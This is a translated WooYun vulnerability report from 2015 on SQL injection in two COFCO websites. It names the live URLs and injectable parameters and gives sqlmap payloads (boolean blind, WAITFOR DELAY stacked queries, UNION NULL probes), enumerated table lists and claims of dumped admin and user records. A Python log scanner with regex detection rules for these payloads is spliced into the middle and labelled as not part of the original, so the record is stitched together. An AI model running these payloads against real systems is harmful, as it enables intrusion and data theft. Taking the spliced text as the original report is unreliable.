Vulnerability summary

Defect ID: wooyun-2015-0133263

Title: SQL injection vulnerabilities in two COFCO sites, bundled (large amounts of sensitive information obtainable)

Vendor: 中粮集团有限公司 (COFCO Corporation)

Author: 路人甲

Submitted: 2015-08-11 09:42

Fixed: 2015-09-25 10:46

Published: 2015-09-25 10:46

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-08-11: Details sent to the vendor, awaiting vendor handling
2015-08-11: Vendor confirmed; details disclosed to the vendor only
2015-08-21: Details disclosed to core white hats and domain experts
2015-08-31: Details disclosed to regular white hats
2015-09-10: Details disclosed to intern white hats
2015-09-25: Details disclosed to the public

Brief description:

test

Detailed description:

Two COFCO sites contain many SQL injection vulnerabilities; I have compiled them into one collection.

Proof of vulnerability:

First site
First: http://506pingjia.cofco.com:8080/IR/activityDetail.jsp?ID=1
Injection point: ID

Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=1' AND 1571=1571 AND 'EtYH'='EtYH
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: ID=1';WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: ID=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(106)+CHAR(113)+CHAR(84)+CHAR(122)+CHAR(107)+CHAR(70)+CHAR(71)+CHAR(84)+CHAR(117)+CHAR(108)+CHAR(104)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--


http://506pingjia.cofco.com:8080/IR/noticeDetail.jsp?ID=274
Injection point: ID

[screenshot: 4.jpg]


Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=1' AND 1571=1571 AND 'EtYH'='EtYH
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: ID=1';WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: ID=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(106)+CHAR(113)+CHAR(84)+CHAR(122)+CHAR(107)+CHAR(70)+CHAR(71)+CHAR(84)+CHAR(117)+CHAR(108)+CHAR(104)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--


http://506pingjia.cofco.com:8080/IR/notice.jsp?ClassID=20129988
Injection point: ClassID

Parameter: ClassID (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: ClassID=20129988');WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: ClassID=20129988') UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(114)+CHAR(107)+CHAR(88)+CHAR(118)+CHAR(65)+CHAR(105)+CHAR(120)+CHAR(78)+CHAR(114)+CHAR(82)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--


Through the injection, the list of databases (dbs) can be enumerated.

[screenshot: 1.jpg]


The tables in the IR database were enumerated:

[screenshot: 2.jpg]


[31 tables]
+--------------------+
| AddressList |
| AllClass |
| AllNews |
| C_cjwt_tb |
| C_cwbg_tb |
| C_cwbg_tb1 |
| C_cwzy_tb |
| C_gdfw_tb |
| C_ggth_tb |
| C_ggth_tb_20140503 |
| C_gszl_tb |
| C_hdjb_tb |
| C_lxwm_tb |
| C_shzr_tb |
| E_AddressList |
| E_AllClass |
| E_cjwt_tb |
| E_cwbg_tb |
| E_cwzy_tb |
| E_gdfw_tb |
| E_ggth_tb |
| E_ggth_tb_20140503 |
| E_gszl_tb |
| E_hdjb_tb |
| E_lxwm_tb |
| E_shzr_tb |
| Job_Class |
| Job_Info |
| sqlmapoutput |
| useradmin |
| yyyzjw_tb |
+--------------------+


The administrator data in the table was dumped for verification:

[screenshot: 3.jpg]


[screenshot: 9.jpg]


Second site: http://cofcomag.cofco.com/cn/periodical/old.aspx?periodical=2015
Injection point: periodical

Parameter: periodical (GET)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: periodical=2015';WAITFOR DELAY '0:0:5'--
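As an added defensive example (not part of the original report or either site's code), the following Python script scans web-server access-log lines for the three payload shapes sqlmap used against these endpoints: time-based stacked queries (WAITFOR DELAY), UNION NULL column probes with CHAR() concatenation, and quote-closing boolean tautologies. The log lines, client IP and timestamps are constructed for illustration; the request paths are the ones named in this report.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Detection rules derived from the sqlmap payload shapes quoted in this report
# (Microsoft SQL Server backend). Each is applied to the URL-decoded parameter value.
RULES = {
    "stacked-waitfor": re.compile(r";\s*WAITFOR\s+DELAY\s+'", re.I),
    "union-null-probe": re.compile(r"UNION\s+ALL\s+SELECT\s+NULL\b", re.I),
    "char-concat": re.compile(r"CHAR\(\d+\)\s*\+\s*CHAR\(\d+\)", re.I),
    "boolean-tautology": re.compile(r"'\s*AND\s+(\d+)=\1\s+AND\s+'(\w+)'='\2", re.I),
}

# Request line of a Combined Log Format entry: "GET /path?query HTTP/1.1"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/[\d.]+"')

# Constructed sample log lines (client IP from the documentation range, timestamps invented),
# modelled on the requests sqlmap would have sent for the payloads in this report.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Aug/2015:09:40:01 +0800] "GET /IR/activityDetail.jsp?ID=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Aug/2015:09:40:02 +0800] "GET /IR/activityDetail.jsp?ID=1%27%20AND%201571%3D1571%20AND%20%27EtYH%27%3D%27EtYH HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Aug/2015:09:40:03 +0800] "GET /IR/activityDetail.jsp?ID=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Aug/2015:09:40:09 +0800] "GET /IR/notice.jsp?ClassID=20129988%27)%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(113)%2BCHAR(122)%2BCHAR(113),NULL-- HTTP/1.1" 200 7744 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/Aug/2015:09:40:10 +0800] "GET /cn/periodical/old.aspx?periodical=2015 HTTP/1.1" 200 9921 "-" "Mozilla/5.0"',
]


def decoded_params(target):
    """Split a request target into (name, decoded value) pairs.

    Splitting on '&' by hand (rather than parse_qsl) keeps the ';' that the
    stacked-query payload relies on inside the value instead of as a separator."""
    pairs = []
    for part in urlsplit(target).query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def scan_log(lines):
    """Return (line number, parameter name, rule name) for every rule hit in the log."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = LOG_RE.search(line)
        if not match:
            continue
        for name, value in decoded_params(match.group("target")):
            for rule, pattern in RULES.items():
                if pattern.search(value):
                    findings.append((lineno, name, rule))
    return findings


if __name__ == "__main__":
    for lineno, name, rule in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: parameter {name!r} matched {rule}")
```

Time-based probes like the WAITFOR DELAY payload are also visible as a cluster of requests whose response times step up by the delay value, so pairing this pattern match with response-time thresholds reduces misses against obfuscated variants.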


Through the injection, the current database can be enumerated.

[screenshot: 6.jpg]


The tables in the database can be enumerated:

[screenshot: 7.jpg]


+----------------------------------------------+
| ASSC_CON |
| ASSET_INFO |
| CON_DOWNLOAD |
| CON_INFO |
| CON_INFO_CORRELATION |
| CON_PRODUCT |
| DOWNLOAD_INFO |
| DOWNLOAD_TYPE |
| HLpst |
| Hnvestormenu |
| I99_Tmp |
| Inc |
| Item_Tbm |
| LABEL_INFO |
| MENU_CONTENT |
| ORGANIZATIONA |
| PICTURE_INFO |
| PRODUCT_INFO |
| SEARCHTEMPLATE1 |
| SYSTEM_MENU |
| SYSTEM_PRIVILEGE |
| SYSTEM_PRIVILEGE_KEY |
| SYSTEM_ROLE |
| SYSTEM_ROLE_USER |
| SYSTEM_USER_TBL |
| SYS_FUNCTION |
| SYS_FUNCTION_ROLE |
| SYS_MENU |
| SYS_MENU_FUNCTION |
| SYS_ROLE |
| SYS_ROLE_USER |
| SYS_USER |
| TEM_INFO |
| TEM_LABEL |
| USER_ORGANIZATION |
| HLTSPOi_DqWNLOAD\\x12\\t\\x0bg\\r\\x038\\x11숇ʬ㽜晦 |
| HLTSPOi_DqWNLOAD\x12\t\x0bg\r\x038\x11숇 |
| columnning |
| dtpropertiey |
| en_info_view |
| searchtemplate_en1 |
| searchteoplate |
| sp_magcontent |
| sqlmapoutput |
| v_4portal |
| v_searchcontent |
| v_searchcontent_bak |
| v_searchcontent_en |
+----------------------------------------------+


The SYS_USER data was dumped for verification:

[screenshot: 8.jpg]

Fix recommendation:

Apply proper input filtering.

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed at: 2015-08-11 10:45

Vendor reply:

Many thanks!

Latest status:

None yet